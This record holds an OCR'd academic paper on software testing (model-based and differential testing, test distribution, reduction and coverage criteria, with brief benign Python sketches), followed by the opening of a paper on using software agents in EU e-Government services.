"pdf_page_numbers": [[0, 423, 1], [423, 2813, 2], [2813, 6108, 3], [6108, 9047, 4], [9047, 12022, 5], [12022, 15153, 6], [15153, 17533, 7], [17533, 20510, 8], [20510, 22216, 9], [22216, 22799, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 22799, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
e8b62e4108db9cef816f11040a94fe53a81a4722
Software Testing: Perception on Exploration and Ad-libbing

SANJEEV DHAWAN*, KULVINDER S. HANDA*, RAKESH KUMAR**

*Faculty of Computer Engineering, University Institute of Engineering & Technology (U.I.E.T), Kurukshetra University, Kurukshetra (K.U.K)- 136 119, Haryana, INDIA.
**Faculty of Computer Science, Department of Computer Science and Applications (D.C.S.A), Kurukshetra University, Kurukshetra (K.U.K)- 136 119, Haryana, INDIA.
E-mail: rsdhawan@rediffmail.com

Abstract: - Developing software which is free from faults remains one of the most challenging and fundamental problems in software engineering. To address the precise needs of software architectures, researchers have pursued formal methods: mathematically based notations, techniques, and tools for correctly documenting software. Despite the availability and potential benefits of formal methods, their use is still far from routine practice. There are numerous reasons, involving issues such as the complexity of the languages and tools, lack of expertise, and the existing software development culture. Perhaps most importantly, the use of formal methods is widely considered to be expensive, which effectively rules out their use for most critical systems. As a result of these cost issues, practicing software engineers have largely avoided formal methods, instead relying on testing. Despite the costs associated with identifying good candidate test cases, running the tests, and validating the results, developers rely upon testing as their primary method of ensuring software dependability.

Key-Words: - Software architecture, software testing, test generation, test distribution, test analysis, test reduction

1 Introduction

Testing is a crucial part of the software life cycle, and recent trends evidence the importance of this activity along the whole development process. The testing activities have to start at the requirement specification level and have to be propagated down to the code level, all along the various subsequent refinement steps. Testing involves several demanding tasks: the ability to launch the selected tests (in a controlled host environment, or worse in the tight target environment of an embedded system); and deciding whether the test outcome is acceptable or not (which is referred to as the test oracle problem). Failures therefore have a cost both through their direct cause (the fault) and through the indirect one (root cause analysis). However, the problem that has received the highest attention in the literature is how to select appropriate test cases. In brief, the question is how to identify a suite of test cases that is effective in demonstrating that the software behaves as intended or, otherwise, in evidencing the existing malfunctions. Clearly, a good test suite is in fact the crucial starting point to a successful testing session. In contrast with the conventional practice of handcrafted ad-hoc test cases, or of random input generation, many methods for systematic test selection have been proposed in the past decades. No method is superior to the others; thus several methods should be used in combination throughout the lifecycle, with the focus shifting, as development proceeds, to differing aspects of software behavior and to differing projections of the system. The term model-based testing refers to test case derivation from a model representing the software behavior.
Indeed, testing is always against an expected behavior: the difference is essentially whether such a model is explicit (which is clearly better) or implicit, i.e., in the mind of the testers. In particular, when there exists a specification of the system to be tested in some formal language, this can be used as the reference model both for test-case selection and as a test oracle. This allows for rigorous mathematical analysis and automated processing. Testing an implementation against its formal specifications is also known as conformance testing, which, looking at the big picture of test strategies, belongs to the black-box class, because we do not consider the internals of a system, but only its input/output behavior. After the test cases are derived from the specifications, two major problems remain to be solved: traceability and test execution. Traceability concerns "relating the abstract values of the specification to the concrete values of the implementation". To be able to execute these tests on the code, we need to refine the test cases into more concrete sequences that have a meaningful interpretation in terms of the actual system I/O interface. Test execution entails forcing the Implementation Under Test (IUT) to execute the specific sequence of events that has been selected. A problem arises with concurrent programs which, starting from the same input, may exercise different sequences of interactions (among several concurrent processes) and produce different results. This problem has already been analyzed in the literature, and deterministic and non-deterministic testing approaches have been proposed. In non-deterministic testing [1], the approach is to repeat the launching of a program run under some specified input conditions several times until the desired test sequence is observed (or a maximum number of iterations is reached). In contrast, the deterministic testing approach forces a program to execute a specified test sequence by instrumenting it with synchronization constructs that deterministically reproduce the desired sequence.

2 Software Architecture and Testing

Software architecture (SA) represents the most promising approach to tackle the problem of scaling up in software engineering, because, through suitable abstractions, it provides the way to make large applications manageable. Nowadays, SA descriptions are commonly integrated into the software development process; SA production and management are, in general, quite expensive tasks. Therefore the effort is worthwhile if the SA artifacts are extensively used for multiple purposes. A typical use of SA is as a high-level design blueprint of the system, to be used during system development and later on for maintenance and reuse. In particular, the importance of the role of SA in testing and analysis is evident. SA formal dynamic descriptions are used for many different kinds of analysis. We are here interested in SA primarily as a means for driving the testing of large, complex systems. Our concern is with exploiting the information described at the SA level to drive the testing of the implementation, i.e., with how formal SA descriptions (and the models obtained from them) can be used for testing purposes [2]. In other words, we assume the SA description is correct and we are investigating approaches to specification-based integration and system testing [3], whereby the reference model used to generate the test cases is the SA description [4][2].
The figure shown below provides a useful hierarchical decomposition of different testing techniques and their relationship to different classes of test adequacy criteria.

![Hierarchical Decomposition of Testing Techniques](image1)

**Fig. 1.** Hierarchical decomposition of different testing techniques

2.1 Fault Detection

Establishing the claim "the system/component is fault-free" is quite beyond most current testing methods. In practice all we can usually say is that we have uncovered a number of faults over a period of testing effort and the graph of the number of faults against the period or amount of testing, measured suitably, indicates that the growth rate is reducing. Figure 2 shows the relationship between fault detection and test time. The trouble is that we do not know, at any particular time, whether further faults remain in the system. Also, in general we cannot assert that the only faults remaining are located in a specific module or component. A general formula for this curve is not known; if one existed, it would probably depend on the type of system, on the type of test methods and perhaps on the people doing and managing the testing, as well as on wider issues relating to the management of the design project, the attitudes of the clients, the implementation vehicle, the design methods and so on.

![Fault Detection and Test Time](image2)

**Fig. 2.** The relationship between fault detection and test time

High-quality empirical results obtained over a very long period would be needed to make proper use of this approach, and even then it is less than ideal.

2.2 Effectiveness of Test

The problem of measuring the effectiveness of an individual testing project usually depends on estimating the coverage of the tests [5]. For example, if the tests are structurally based, using program charts, say, then popular methods include establishing that every path has been exercised or every decision node has been visited. This does not tell us anything about fault detection; it merely measures effort rather than reward! The currently accepted definition of fault coverage is misleading, since it is not the case that a precise measure can be placed on the number of faults that remain after the test process has been applied. In most cases the definition of fault coverage is based on assumptions of the type described above, which we are questioning. In much of the literature the estimates of fault coverage are obtained by running experiments with simple examples involving implementations that have faults seeded in them and counting the numbers of known faults detected by the methods. These empirical results are of curiosity value only. Miller & Paul provide a theoretical method for establishing the fault coverage of a test strategy; however, they assume that the implementation machine has the same number of states as the specification machine. Before we look, briefly, at what progress there has been in addressing some of the theoretical issues of testing, we will consider a popular method for the analysis and comparison of the effectiveness of different testing methods.

2.3 Test Method Effectiveness

A number of authors have sought to compare the effectiveness of, for example, random testing methods with formally based functional testing [1]. Here the method was to take a small system and to insert known faults into it, then to apply the two techniques to establish which was most successful at detecting these faults.
Further analysis could be done on the type of faults each method was good or poor at detecting. Faults were classified for this purpose in a number of categories. Results from this type of survey can be useful in establishing the relative strengths and weaknesses of different, specific methods of test set generation. However, the situation is essentially artificial and it is not clear what can be said in general. The method is unable to prove, for example, that either approach is better at detecting naturally occurring or unseeded faults (the seeded ones may not be typical of real faults), or to identify conditions under which a method detects all faults. A number of attempts at developing a theory of testing or at analyzing the testing situation have been made. We will briefly consider a few of them, as follows:

2.3.1 An Algebraic Approach to Computational Modeling

The process of software design, including within that activity all phases of requirements capture, specification, design, prototyping, analysis, implementation, validation, verification and maintenance, is one that is oriented, or should be, around the construction of computational solutions to specific problems. When we are constructing a software system (this also applies to hardware) we are attempting to construct something that will, when operating, carry out some computable function. Consequently it is worth considering what this means. Essentially, computable functions have been identified as the functions computed by Turing machines. The method will not be applicable to implementations that behave like a Turing machine that does not halt. In other words, we will not try to deal with those systems that regress into an infinite loop from which no output emanates; for our purposes these systems will be deemed unacceptable anyway. A way to establish that a system is not of this form is to identify a period of time which is the maximum that the system can run for without producing any detectable output. We will also assume that the specification of the system is of this form, namely a Turing machine that halts under its intended operating conditions. Real-time systems are covered by this definition, since we require that the specified system does have detectable behavior under all conditions. This is a kind of design-for-test condition that we will see more of later. We then have two algebraic objects: the Turing machine representing the specification of the desired system and the Turing machine representing the complete implementation. A testing method would then try to ascertain whether these two machines computed the same function. This is a basic strategy that we will develop, however, not in the context of a Turing machine, which is too low-level and unwieldy, but in the context of a more useful, elegant and equivalent model. In so doing we will quote some important theoretical results that justify what we are doing. It is important to stress that the method of finite state machine testing proposed by Chow, and developed by a number of other authors, is based on a similar sort of philosophy, the difference being that they have to make very strong assumptions about the nature of the implementation machine. However, their work did act as an important inspiration for our own work on finite state machine testing.

2.3.2 Model-based Testing

Simply put, a model of software is a depiction of its behavior.
Behavior can be described in terms of the input sequences accepted by the system, the actions, conditions, and output logic, or the flow of data through the application's modules and routines. In order for a model to be useful for groups of testers and for multiple testing tasks, it needs to be taken out of the mind of those who understand what the software is supposed to accomplish and written down in an easily understandable form. It is also generally preferable that a model be as formal as it is practical. With these properties, the model becomes a shareable, reusable, precise description of the system under test. There are numerous such models, and each describes different aspects of software behavior. For example, control flow, data flow, and program dependency graphs express how the implementation behaves by representing its source code structure. Decision tables and state machines [6], on the other hand, are used to describe external, so-called black-box behavior. When we speak of model-based testing (MBT), the testing community today tends to think in terms of such black-box models.

2.3.3 Differential Testing

Differential testing addresses a specific problem: the cost of evaluating test results. Every test yields some result. If a single test is fed to several comparable programs (for example, several C compilers), and one program gives a different result, a bug may have been exposed. For usable software, very few generated tests will result in differences. Because it is feasible to generate millions of tests, even a few differences can result in a substantial stream of detected bugs. The trade-off is to use many computer cycles instead of human effort to design and evaluate tests. Particle physicists use the same paradigm: they examine millions of mostly boring events to find a few high-interest particle interactions. Several issues must be addressed to make differential testing effective [4]. The first issue concerns the quality of the test. Any random string fed to a C compiler yields some result, most likely a diagnostic. Feeding random strings to the compiler soon becomes unproductive, however, because these tests provide only shallow coverage of the compiler logic. Developers must devise tests that drive deep into the tested compiler. The second issue relates to false positives. The results of two tested programs may differ and yet still be correct, depending on the requirements. Similarly, even for required diagnostics, the form of the diagnostic is unspecified and therefore difficult to compare across systems. The third issue deals with the amount of noise in the generated test case. Given a successful random test, there is likely to be a much shorter test that exposes the same bug. The developer who is seeking to fix the bug strongly prefers to use the shorter test. The fourth issue concerns comparing programs that must run on different platforms. Differential testing is easily adapted to distributed testing.

3 Need of Generating Tests

The difficulty of generating tests from a model depends on the nature of the model. Models that are useful for testing usually possess properties that make test generation effortless and, frequently, automatable. For some models, all that is required is to go through combinations of conditions described in the model, requiring simple knowledge of combinatorics. In the case of finite state machines, it is as simple as implementing an algorithm that randomly traverses the state transition diagram. The sequences of arc labels along the generated paths are, by definition, tests. For example, in the state transition diagram below, the sequence of inputs "a, b, d, e, f, i, j, k" qualifies as a test of the represented system.

![State Transition Diagram](image)

**Fig. 3.** The state transition diagram
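A minimal sketch of such a random traversal is shown below; the particular graph encoding, transition table and stopping rule are assumptions made for the illustration, not details taken from the paper.

```python
# Sketch: generate a test as a random walk over a state transition diagram.
# The machine is encoded as state -> list of (input label, next state);
# the resulting sequence of input labels is, by definition, a test.
import random

TRANSITIONS = {
    "S0": [("a", "S1")],
    "S1": [("b", "S2"), ("c", "S0")],
    "S2": [("d", "S3"), ("e", "S1")],
    "S3": [("f", "S0")],
}

def random_test(start="S0", max_steps=8, rng=random):
    """Walk the diagram from `start`, collecting arc labels as the test."""
    state, test = start, []
    for _ in range(max_steps):
        if not TRANSITIONS.get(state):      # dead end: stop the walk
            break
        label, state = rng.choice(TRANSITIONS[state])
        test.append(label)
    return test

print(random_test())   # e.g. ['a', 'b', 'd', 'f', 'a', 'c', 'a', 'b']
```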
There are a variety of constraints on what constitutes a path that meets the criteria for tests. Examples include having the path start and end in the starting state, restricting the number of loops or cycles in a path, and restricting the states that a path can visit. While writing the automation code, adherence to good engineering practices is required. Scripts are bound to interact with each other and evolve as the software evolves. Scripts can be used for as long as the software is being tested, so it is worthwhile investing some time in writing good, efficient ones. With model-based testing, the number of simulation routines is on the order of the number of inputs, so they are generally not too time-consuming to write [7].

4 Test Distribution

Each tested or comparison program must be executed where it is supported. This may mean different hardware, a different operating system, and even a different physical location. There are numerous ways to utilize a network to distribute tests and then gather the results. One particularly simple way is to use continuously running watcher programs. Each watcher program periodically examines a common file system for the existence of some particular files upon which the program can act. If no files exist, the watcher program sleeps for a while and tries again. On most operating systems, watcher programs can be implemented as command scripts. There is a test master and a number of test beds. The test master generates the test cases, assigns them to the test beds, and later analyzes the results. Each test bed runs its assigned tests. The test master and test beds share a file space, perhaps via a network. For each test bed there is a test input directory and a test output directory. A watcher program called the test driver waits until all the (possibly remote) test input directories are empty. The test driver then writes its latest generated test case into each of the test input directories and returns to its watch-sleep cycle. For each test bed there is a test watcher program that watches the corresponding test input directory. When a test watcher finds a file to test, the test watcher runs the new test, puts the results in its test output directory, and returns to the watch-sleep cycle. Another watcher program called the test analyzer waits until all the test output directories contain results. Then the results, both input and output, are collected for analysis, and all the files are deleted from every test input and output directory, thus enabling another cycle to begin. Using the file system for synchronization is adequate for computations on the scale of a compile-and-execute sequence. Because of the many sleep periods, this distribution system runs efficiently but not fast. If throughput becomes a problem, the test system designer can provide more sophisticated remote execution. The distribution solution as described is neither robust against crashes and loops nor easy to start. It is possible to elaborate the watcher programs to respond to a reasonable number of additional requirements.
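As an illustration of the watcher pattern described above, the following sketch shows a test-bed watcher loop in Python; the directory layout, the command under test (`cc_under_test`) and the polling interval are assumptions made for the example.

```python
# Sketch of a test-bed watcher: poll the shared test input directory, run
# any test case found, write the result to the output directory, and
# return to the watch-sleep cycle.
import pathlib
import subprocess
import time

IN_DIR = pathlib.Path("testbed1/in")
OUT_DIR = pathlib.Path("testbed1/out")
SLEEP_SECONDS = 5

def watch():
    IN_DIR.mkdir(parents=True, exist_ok=True)
    OUT_DIR.mkdir(parents=True, exist_ok=True)
    while True:
        cases = sorted(IN_DIR.glob("*.c"))
        if not cases:
            time.sleep(SLEEP_SECONDS)       # nothing to do: sleep and retry
            continue
        for case in cases:
            try:
                result = subprocess.run(
                    ["cc_under_test", str(case)],
                    capture_output=True, text=True, timeout=60,
                )
                report = f"returncode={result.returncode}\n{result.stdout}{result.stderr}"
            except subprocess.TimeoutExpired:
                report = "TIMEOUT: possible endless loop\n"
            (OUT_DIR / (case.stem + ".result")).write_text(report)
            case.unlink()                   # consume the input file

if __name__ == "__main__":
    watch()
```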
5 Test Analysis

The test analyzer can compare the output in various ways. The goal is to discover likely bugs in the compiler under test. The initial step is to distinguish the test results by failure category, using corresponding directories to hold the results. If the compiler under test crashes, the test analyzer writes the test data to the crash directory. If the compiler under test enters an endless loop, the test analyzer writes the test data to the loop directory. If one of the comparison compilers crashes or enters an endless loop, the test analyzer discards the test, since reporting the bugs of a comparison compiler is not a testing objective. If some, but not all, of the test case executions terminate abnormally, the test case is written to the ABEND directory. If all the test cases run to completion but the output differs, the case is written to the test diff directory. Otherwise, the test case is discarded.

6 Test Reduction

A tester must examine each filed test case to determine if it exposes a fault in the compiler under test. The first step is to reduce the test to the shortest version that qualifies for examination. A watcher called the crash analyzer examines the crash directory for files and moves found files to a working directory. The crash analyzer then applies a shortening transformation to the source of the test case and reruns the test. If the compiler under test still crashes, the original test case is replaced by the shortened test case. Otherwise, the change is backed out.

7 Generator of Test Data

Test data generation addresses testing the functional requirements of the software, i.e., the relationship between input and output, as well as checking non-functional requirements like temporal constraints, and is guided by a test adequacy criterion. There exist many such criteria. For example, statement coverage requires all the statements in the program to be executed. Branch coverage, on the other hand, requires taking all the branches in the conditional statements. Condition-decision coverage strengthens this: to fulfill it, every condition and every decision must evaluate to both true and false at least once over the whole set of test data. A condition is an expression that is evaluated during the program execution to a Boolean value (true or false) with no other nested conditions. All comparison expressions are conditions. In contrast, a decision is a Boolean expression whose value affects the control flow. It is important to note that full condition-decision coverage implies full branch coverage but not vice versa. That is, a set of test inputs achieving condition-decision coverage makes every decision take the values true and false and, in consequence, all branches will be taken; but taking all branches does not ensure that all conditions take the two Boolean values.
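The difference between the criteria can be seen on a two-condition decision. In the illustrative snippet below (not taken from the paper), two test inputs achieve full branch coverage of the decision while one of its conditions never evaluates to false, so condition-decision coverage is not met.

```python
# Two tests take both branches of the decision in `f`, yet the condition
# `a > 0` never evaluates to False, so condition-decision coverage fails.

def f(a, b):
    if a > 0 and b > 0:     # one decision with two conditions: a > 0, b > 0
        return "both positive"
    return "not both positive"

tests = [(1, 1),    # decision True  -> then-branch taken
         (1, -1)]   # decision False -> else-branch taken

for a, b in tests:
    print(f(a, b), "| a > 0 is", a > 0, "| b > 0 is", b > 0)
# Across both tests: the decision takes both values (full branch coverage)
# and b > 0 takes both values, but a > 0 is always True, so the stronger
# condition-decision criterion is not satisfied.
```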
8 Conclusions and Predictions

Testing is an important technique for the improvement and measurement of a software system's quality. Any approach to testing software faces essential and accidental difficulties. While software testing is not an elixir that can guarantee the production of high-quality applications, theoretical and empirical investigations have shown that the rigorous, consistent, and intelligent application of testing techniques can improve software quality. Software testing normally involves the stages of test case specification, test case generation, test execution, test adequacy evaluation, and regression testing. Each of these stages in our model of the software testing process plays an important role in the production of programs that meet their intended specification. The body of theoretical and practical knowledge about software testing continues to grow as research expands the applicability of existing techniques and proposes new testing techniques for an ever-widening range of programming languages and application domains [8].

References:
{"Source-Url": "http://www.wseas.us/e-library/conferences/2009/baltimore/MACMESE/MACMESE-15.pdf", "len_cl100k_base": 4742, "olmocr-version": "0.1.53", "pdf-total-pages": 6, "total-fallback-pages": 0, "total-input-tokens": 19125, "total-output-tokens": 5420, "length": "2e12", "weborganizer": {"__label__adult": 0.00030684471130371094, "__label__art_design": 0.0002803802490234375, "__label__crime_law": 0.0003063678741455078, "__label__education_jobs": 0.0007319450378417969, "__label__entertainment": 4.756450653076172e-05, "__label__fashion_beauty": 0.00012946128845214844, "__label__finance_business": 0.0001183152198791504, "__label__food_dining": 0.00032639503479003906, "__label__games": 0.0005617141723632812, "__label__hardware": 0.0005998611450195312, "__label__health": 0.00035071372985839844, "__label__history": 0.000141143798828125, "__label__home_hobbies": 6.014108657836914e-05, "__label__industrial": 0.0002434253692626953, "__label__literature": 0.0002522468566894531, "__label__politics": 0.00016379356384277344, "__label__religion": 0.0003740787506103515, "__label__science_tech": 0.007099151611328125, "__label__social_life": 6.4849853515625e-05, "__label__software": 0.004955291748046875, "__label__software_dev": 0.98193359375, "__label__sports_fitness": 0.0002512931823730469, "__label__transportation": 0.000301361083984375, "__label__travel": 0.00016260147094726562}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 26788, 0.02634]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 26788, 0.66926]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 26788, 0.93218]], "google_gemma-3-12b-it_contains_pii": [[0, 4422, false], [4422, 8362, null], [8362, 13557, null], [13557, 17921, null], [17921, 23040, null], [23040, 26788, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4422, true], [4422, 8362, null], [8362, 13557, null], [13557, 17921, null], [17921, 23040, null], [23040, 26788, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 26788, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 26788, null]], "pdf_page_numbers": [[0, 4422, 1], [4422, 8362, 2], [8362, 13557, 3], [13557, 17921, 4], [17921, 23040, 5], [23040, 26788, 6]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 26788, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
c3d65c1cb3e4bca3d435849e0780158da17460ff
Perspectives for using software agents in e-Government applications

Zbigniew Piotrowski*

Faculty of Computer Science and Information Systems, Szczecin University of Technology, Żołnierska 49, 71-210 Szczecin, Poland

*e-mail address: zpiotrowski@wi.ps.pl

Abstract

Governing a country includes a set of decentralised processes. Moreover, in unions of countries with an integrated economic space, the decentralisation issue gains additional attention. The best-known examples of federated governments are two of the biggest world economies: the United States of America and the European Union. Decentralisation is even more significant when considering resources for businesses. Specifically, the workforce, the land and the infrastructure are commonly managed at the local or the sub-local level. The paper addresses the issues concerning citizens' mobility (both for personal and professional purposes) and businesses' pan-European operations. The application of autonomous software agents to aid cross-border business operations and citizens' movements is addressed. The paper presents the possibility of making citizens' movements smoother and involving less paperwork. To support these ideas, the foundations and conclusions of the Infocitizen initiative are introduced. In the conclusions of the paper, it is suggested that agencies at all levels of government should use agent-based technology to open agent-ready virtual offices. It would benefit users if they were allowed to set up software agents to act on their behalf and to search all possible locations in order to find the required resources; doing this manually would be impossible or extremely resource-consuming.

1. Introduction

The purpose of the Lisbon Strategy, drawn up by the European Union (EU), is to make the European economy the world's most competitive economy in terms of innovation, social inclusion, liberalisation and enterprise environment. The competitiveness of the EU is still behind the world's most developed economies, which are the USA and a group of "Asian tigers": Japan, Hong Kong, the Republic of Korea, Singapore and Taiwan. In 2006 the EU average indicators were still far behind the leaders in the vast majority of analysed categories. To face that challenge, in February 2005 the Lisbon Strategy was re-launched with new guidelines. The "Working together for growth and jobs" [1] strategy directs the main effort of the EU to making Europe a more attractive place to invest and work. To achieve that goal the EU needs to improve regulations and create a consistent single market without any obstacles. Switching to the euro – the common currency of European countries – was the first step in creating an integrated market covering the whole continent. Moreover, the consistency of legal systems and freedom of operations is considered the main factor deciding the openness of the market. Additionally, an attractive place for jobs requires assuring the unrestricted mobility of the workforce. Unfortunately, the European market's openness is far behind the traditional freedom of the market in the USA, where all 50 states, which can be perceived as analogous to the 29 European Economic Area countries, are under a single federal jurisdiction, use the same currency and speak the same language. Achieving business and citizen mobility comparable to that of the USA is a challenge for European countries.
To provide such functionality and to protect countries' sovereignty at the same time, the governments and administration structures of all countries must cooperate closely. However, such cooperation and fast as well as error-free information exchange would not be possible without applying advanced Information Technology (IT) solutions. Moreover, competing with the USA in the field of becoming the most competitive knowledge-based economy of the world is possible only if the integration level of the IT infrastructures of all member states is sufficiently high [1,2]. The usefulness of IT in supporting administrative tasks is closely bound up with citizens' ability to deal with e-solutions. In recent years citizens' e-literacy has been growing around the world. Applying electronic solutions requires citizens to put more trust in their governments; on the other hand, IT solutions give citizens more control over the government's actions. The efficiency of e-Government can be improved by raising the overall level of education and computer literacy as well as by developing the appropriate infrastructure [3].

2. Decentralisation of the government

Decentralising government competences arises from the European Treaty and is aligned with the European Union's strategy. A country's law shall guarantee local governments all means necessary to perform their duties. The preamble of the European Charter of Local Self-Government [4] states: "Considering that the local authorities are one of the main foundations of any democratic regime; Considering that the right of citizens to participate in the conduct of public affairs is one of the democratic principles that are shared by all member States of the Council of Europe; Considering that it is at the local level that this right can be most directly exercised;"¹. The document was ratified by 43 countries at the end of the year 2007².

¹ Source: [4]
² http://conventions.coe.int/treaty/Commun/QueVoulezVous.asp?NT=122&CL=ENG

Reorganisation of the country's administrative structure from a centrally managed one into a self-governed one was carried out in Poland at the beginning of the democratic reforms. The reorganisation is considered successful, and it improved Poland's management especially in the area of European financial aid, which became noticeable shortly before and after Poland's accession to the EU. Local governments improved their success ratio in obtaining EU Structural and Cohesion Funds. In the EU, companies are not the only ones competing with each other. Public agencies, governments, regions and cities compete as well. On the other hand, when a country enters the EU structures, it is bound by a new set of regulations. Government institutions simultaneously compete and cooperate with those across the entire Europe [5]. Moreover, the increased competition between regions is accompanied by the increased mobility of citizens and businesses. Mobile workers are willing to travel to any place to get their dream job. Mobility is embraced by the European Union as a factor which improves the competitiveness of the joint European economy. Therefore both new services required by citizens and existing services should respond to the increased mobility of citizens. The main issue with citizens' migrations is the lack of a consistent information exchange architecture/infrastructure. Institutions use their own systems, which are often incompatible even within one country, not to mention the absence of automated cross-border information exchange. Removing physical borders (on 21.12.2007 the Schengen zone grew to 22 countries) is not accompanied by removing administrative ones.
Centralisation of administrative tasks is impossible from the technological and organisational points of view. Furthermore, it is against the European philosophy of moving governance closer to the people. Finally, centralisation of some tasks could be seen as an encroachment on a country's sovereignty. Hence, other means of providing citizens with a consistent European-wide administration should be developed. European countries which have made some progress in developing their e-Government infrastructure have produced sets of best practices and interoperability frameworks for that area. These attempts were noticed by the European community, and the European Interoperability Framework [6] was created. Introducing e-Government initiatives at the local level shifts power from public managers to citizens and businesses. The approach presented in [7] suggests at first shaping e-Government initiatives by public managers employed by government agencies and afterwards giving more control to local societies. The customers – in the case of the government, citizens and businesses – shall decide what level of technological advancement is necessary to achieve their goals. The paper warns against projecting citizens' or businesses' expectations directly onto the e-Government structure. Their expectations can often have a very complex and indirect influence on the desired e-Government functionalities.

3. Local resources for citizens and businesses

Each country possesses specific material and non-material resources. There are various statistics on countries' resource allocations; however, these statistics do not show the real availability of particular resources in particular places. The central government of a country is too remote and too concerned with the big picture to micromanage resources at the local level. Making resources available to companies is the task of specialised government agencies; in the case of Poland these agencies are PAIiIZ³ (winning and supporting foreign investments) and PARP⁴ (supporting domestic small and medium enterprises).

³ http://www.paiz.gov.pl/
⁴ http://www.parp.gov.pl/

However, these agencies do not own any resources themselves; they contact local governments to ask about the availability of the resources. This approach makes the process less flexible and more time-consuming. Electronic and automated workflow should be introduced to make providing potential investors with resources more efficient. Despite the growing understanding of the role of the Internet in communication with businesses, using e-Government technologies as a competitive factor for regions is yet to be discovered. Local governments are closer to local societies and can listen to their needs. They also have access to more accurate information about the environment and available resources. The local government knows the detailed structure of the demographic profile of the society; therefore it can conclude what types of companies would benefit the region most. For example, when the society is young and educated, the local administration should attract research facilities or high-tech companies which can utilise the locally available workforce. The main driver of all businesses is to maximise profit. Outsourcing of various processes has gained significant attention in recent years. Companies are moving their production to countries where the costs of manufacturing or providing services are lower.
However, it is not rare that a cost-effective operation meets obstacles in the form of a huge amount of administrative paperwork to fulfil. Doing the accounting for an investment in a foreign country often requires hiring a consulting company or founding a shell company in the target country. The additional effort is required because operations in every country are subject to different jurisdictions and are considered separate ventures. The additional paperwork creates additional costs.

³ http://www.paiz.gov.pl/
⁴ http://www.parp.gov.pl/

The availability of government services on the Internet evolves and can be divided into phases, starting with (1) an initial presence of an institution marked by a simple website with basic information. In further stages the government moves on to (2) extending the presence by adding dynamic information, (3) adding interactivity (downloadable forms, gathering feedback) and finally to (4) the transactional level, where citizens can use a remote connection to initiate transactions, which effectively amounts to a virtual visit to an institution’s branch by interacting with its website. Advancing the interaction level between citizens and the government is accompanied by integrating services from different levels of the government (vertical integration) and by integrating complementary services from different sources (horizontal integration). The final and most evolved level is the full integration of all services at the country level. In such a scenario a citizen can access all services from a single website (one-stop-shop), where he or she uses a unique identification name and password (single log-on) to perform all operations regardless of their origin and to have all fees put on a single consolidated bill. The information exchange between all institutions is integrated both at the presentation layer (from the citizen’s point of view) and at the business logic layer (from the institution’s point of view) [7]. The issue which makes vertical integration more difficult is the slower progress in developing electronic services by authorities at the local level. Even in countries with highly developed services at the country level, the local level is strongly underdeveloped. The situation is better in bigger cities, which discovered the potential of electronic access channels earlier than smaller communities. Furthermore, services for businesses tend to be developed first, as a more business-friendly environment attracts more investment to the region. Creating e-Government services at any level is a good start for propagating the idea to other levels. Once citizens get acquainted with a service in one institution, they will demand it from other agencies. The same rule applies to agencies: when a decision maker sees how another agency benefits from a particular service, he embraces creating the same service for his institution [7].

4. Applying software agents

4.1. The idea of an agent localising administration units

The software agents paradigm describes an approach to mobile computing where mobile code is executed on various host systems. The four main characteristics of a software agent can be distinguished [8]; a minimal sketch of an agent exposing these characteristics follows the list.
- Intelligence – ability to adapt to a changing working environment,
- Cooperative behaviour – negotiating and sharing knowledge with other agents,
- Autonomy – performing specified tasks without any interaction from the user,
- Mobility – ability to transfer to another host system.
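The following is a minimal, illustrative Python sketch of an agent interface reflecting these four characteristics. All class and method names are hypothetical and serve only to make the terminology concrete; they do not come from any of the cited systems.

```python
from dataclasses import dataclass, field

@dataclass
class SoftwareAgent:
    """Toy agent exposing the four characteristics listed above (hypothetical API)."""
    task: str
    knowledge: dict = field(default_factory=dict)

    def adapt(self, environment: dict) -> None:
        # Intelligence: adjust internal state to a changing working environment.
        self.knowledge.update(environment)

    def negotiate(self, other: "SoftwareAgent") -> dict:
        # Cooperative behaviour: share knowledge with another agent.
        shared = {**other.knowledge, **self.knowledge}
        other.knowledge.update(shared)
        return shared

    def run(self) -> str:
        # Autonomy: perform the specified task without user interaction.
        return f"completed: {self.task} using {len(self.knowledge)} facts"

    def migrate(self, host: str) -> str:
        # Mobility: a real mobile-agent platform would serialize the agent's
        # state and resume it on the remote host; here we only report it.
        return f"agent state serialized and sent to {host}"
```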
